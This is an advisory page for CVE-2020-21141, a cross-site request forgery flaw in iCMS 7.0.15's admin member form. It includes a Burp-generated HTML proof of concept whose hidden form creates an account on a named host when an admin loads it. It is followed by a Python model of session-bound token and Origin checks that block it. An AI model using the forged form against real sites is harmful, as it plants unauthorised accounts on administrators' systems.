CVE-2020-21141: just_for_fun/ICMS CSRF at master · hxcc/just_for_fun

iCMS v7.0.15 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admincp.php?app=members&do=add.


URL: http://example.com/admincp.php?app=members&do=add

Adding an administrator account: when a logged-in administrator loads the attacker's page, the browser auto-submits the member form and creates a user named "test" with password "test123" (the values in the PoC below). The PoC posts to do=save, the handler behind the do=add form. The CSRF_TOKEN value in the form action is the one Burp captured when the PoC was generated; the report does not say how an attacker obtains or reuses that value, so whether the request is accepted by the target depends on how that token is validated.

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <!-- Strip the attacker's page from the URL bar before the form fires. -->
    <script>history.pushState('', '', '/')</script>
    <!-- Target is do=save, the POST handler behind the do=add form.
         The CSRF_TOKEN below is the value captured when the PoC was generated. -->
    <form action="http://icms7.idreamsoft.com/admincp.php?app=members&do=save&frame=iPHP&CSRF_TOKEN=4c28f0f8QKQNRAGZMLvRszVV4M4YP-Z9LcQw5n4jlHvq8TB75xVPVxXEAm-CemjoSPieJrYFxlq0J5VblFF1FY5qJah0_jlDDAKiTXs" method="POST">
      <input type="hidden" name="uid" value="0" />
      <input type="hidden" name="type" value="" />
      <input type="hidden" name="gid" value="1" />
      <input type="hidden" name="uname" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="nickname" value="test" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="info[QQ]" value="" />
      <input type="hidden" name="info[blog]" value="" />
      <input type="hidden" name="info[year]" value="" />
      <input type="hidden" name="info[month]" value="" />
      <input type="hidden" name="info[day]" value="" />
      <input type="hidden" name="info[from]" value="" />
      <input type="hidden" name="info[sign]" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
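The following is an added example, not code from the hxcc/just_for_fun report or from iCMS. It models the server side of the do=save handler as a plain Python function and shows the checks that would stop the PoC above: the anti-CSRF token is bound to the admin's session, must arrive in the POST body rather than the URL, and the Origin (or Referer) header must match the site. The request shape, the session id, the member store and the attacker origin `http://attacker.example` are constructed for this example; `SITE_ORIGIN` is taken from the PoC's form action.

```python
# Added example: a session-bound anti-CSRF check for a form handler like
# /admincp.php?app=members&do=save. Not iCMS code; all inputs are constructed.
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

SECRET_KEY = secrets.token_bytes(32)          # per-process server secret (constructed)
SITE_ORIGIN = "http://icms7.idreamsoft.com"   # origin of the admin panel in the PoC
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the admin's session: HMAC-SHA256(SECRET_KEY, session_id).

    A token captured for one session is useless for any other, and the
    server never has to store it: it recomputes the expected value on check.
    """
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(headers: dict) -> Optional[str]:
    """Requesting origin from the Origin header, falling back to Referer."""
    if headers.get("Origin"):
        return headers["Origin"]
    ref = headers.get("Referer")
    if ref:
        parts = urlsplit(ref)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_rejection_reason(request: dict) -> Optional[str]:
    """Return None if the request passes, else a short reason it was refused.

    request = {"method", "headers", "session_id", "query", "form"} (constructed shape).
    """
    if request["method"] not in STATE_CHANGING:
        return None                                   # reads carry no state change

    # 1. A form planted on attacker.example cannot forge the browser-set Origin.
    origin = _origin_of(request["headers"])
    if origin != SITE_ORIGIN:
        return "origin-mismatch" if origin else "origin-missing"

    # 2. The token must travel in the POST body. A token in the URL (as in the
    #    PoC's action) leaks through Referer headers, proxies and server logs.
    submitted = request["form"].get("CSRF_TOKEN")
    if submitted is None:
        return "token-missing"

    # 3. Constant-time comparison against the token for *this* session.
    expected = issue_csrf_token(request["session_id"])
    if not hmac.compare_digest(submitted, expected):
        return "token-mismatch"
    return None


def members_save(request: dict, members: list) -> str:
    """Model of the do=save handler: create the member only if the check passes."""
    reason = csrf_rejection_reason(request)
    if reason is not None:
        return f"rejected:{reason}"
    f = request["form"]
    members.append({"uname": f["uname"], "gid": f["gid"]})
    return f"created:{f['uname']}"


def demo() -> dict:
    """Run a PoC-shaped request and a genuine one against the handler."""
    admin_session = "sess-admin-1"                # constructed session id
    members: list = []
    poc_fields = {"uid": "0", "gid": "1", "uname": "test", "pwd": "test123"}

    # The Burp-generated form above: cross-site POST, token only in the query string,
    # the admin's session cookie attached by the browser.
    forged = {
        "method": "POST",
        "headers": {"Origin": "http://attacker.example"},
        "session_id": admin_session,
        "query": {"CSRF_TOKEN": "token-copied-from-the-poc-url"},   # constructed stand-in
        "form": dict(poc_fields),
    }
    # The same fields submitted from the admin panel with the session-bound token.
    genuine = {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN},
        "session_id": admin_session,
        "query": {},
        "form": {**poc_fields, "CSRF_TOKEN": issue_csrf_token(admin_session)},
    }
    return {
        "forged": members_save(forged, members),
        "genuine": members_save(genuine, members),
        "members": members,
    }


if __name__ == "__main__":
    print(demo())
```

The three checks are layered on purpose: the Origin check alone fails for clients that strip Referer and send no Origin, which is why the token check remains the primary control, and a `SameSite=Lax` or `Strict` attribute on the admin session cookie (not modelled here) would stop the browser from attaching the cookie to the cross-site POST in the first place.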
